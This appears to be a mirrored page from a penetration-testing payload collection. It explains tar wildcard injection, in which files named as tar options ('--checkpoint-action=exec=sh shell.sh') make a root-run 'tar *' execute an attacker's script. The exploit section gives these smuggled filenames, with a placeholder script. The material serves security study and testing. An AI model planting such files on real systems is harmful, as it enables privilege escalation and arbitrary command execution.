mirror of https://github.com/swisskyrepo/PayloadsAllTheThings synced 2024-07-05 18:01:35 +00:00

History

Swissky a6475a19d9 Adding references sectio		2018-12-24 15:02:50 +01:00
..
Files	Architecture - Files/Intruder/Images and README + template	2018-12-23 00:45:45 +01:00
README.md	Adding references sectio	2018-12-24 15:02:50 +01:00

README.md

TAR Command Execution

By using tar with –checkpoint-action options, a specified action can be used after a checkpoint. This action could be a malicious shell script that could be used for executing arbitrary commands under the user who starts tar. “Tricking” root to use the specific options is quite easy, and that’s where the wildcard comes in handy.

Exploit

These files work against a "tar *"

--checkpoint=1
--checkpoint-action=exec=sh shell.sh
shell.sh   (your exploit code is here)

References

Exploiting wildcards on Linux - Berislav Kucan
Code Execution With Tar Command - p4pentest
Back To The Future: Unix Wildcards Gone Wild - Leon Juranic

README.md Unescape Escape

TAR Command Execution

Exploit

References

README.md